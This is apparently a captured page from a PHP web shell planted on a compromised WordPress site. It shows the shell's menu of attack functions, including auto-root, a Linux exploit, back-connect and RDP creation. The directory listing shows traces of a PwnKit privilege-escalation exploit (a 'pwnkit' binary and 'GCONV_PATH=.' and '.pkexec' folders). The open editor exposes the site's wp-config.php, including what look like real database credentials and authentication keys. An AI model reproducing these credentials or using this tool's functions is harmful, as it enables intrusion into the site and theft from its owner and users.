Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.242.82
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aev999 /
public_html /
sv169.cam /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
6.7
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
575
B
-rw-r--r--
admin.php
5.22
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cjfuns.php
24.37
KB
-rw-r--r--
error_log
14.36
KB
-rw-r--r--
index.php
405
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
options-reading.php
70.78
KB
-rw-r--r--
php.ini
631
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
shoyo.php
0
B
-r--r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.23
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php define( 'WP_CACHE', true ); // Added by WP Rocket /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'aev999_wp_2j1wf' ); /** Database username */ define( 'DB_USER', 'aev999_wp_2bwcf' ); /** Database password */ define( 'DB_PASSWORD', '048rv%!Pb@F6$UE!' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'CR6Lg~]YS0@;645nr]Hzj!xRmQ*F5w5]q%P&6w0E+AkF_1y!HeXIH:P8_o8o]3(#'); define('SECURE_AUTH_KEY', ';x/X(#]tyTFPmGVW8N!15d_lt0u3Xp0R_3!;/e~8KkF3:dCA1[f3)):q@TE21w50'); define('LOGGED_IN_KEY', 'pV&/a-gI2;wr&3lC1o40E74zQ1Y9lr98o1sw0|-Cl7e~7AJ9|C7%7&z_~3+A4m~B'); define('NONCE_KEY', '@EDJVUX+~k(4)y592cu)(T41y17un~4]+/kAaq%p%ky;u8Mwb0W)])E6Cr9[Ci7B'); define('AUTH_SALT', '@9JuQNHN_%839|#70r@3G!@|:Lp);a+&y-p:F1z41YWYI])[36Qi914U;2jm:Kk!'); define('SECURE_AUTH_SALT', 'O7Ov70QTa2!7zH0dez(fmeT*q|#UJ~)gHu:Jb&jw83:~JsW#nK(236&tYYnP0A&;'); define('LOGGED_IN_SALT', 'Oc3+9:9%c#68hs%OvnQtdS02Z]k;X4yj8-IfX6(j75a7tW#gM39X%DLRHmMQTer@'); define('NONCE_SALT', 'Y~6J[w3tYeE041pnD2u%G~A2Ro+60(4l3qoR67Krzpy)a~@H-|+6#2bh8-q~z&z9'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'rkCSW_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close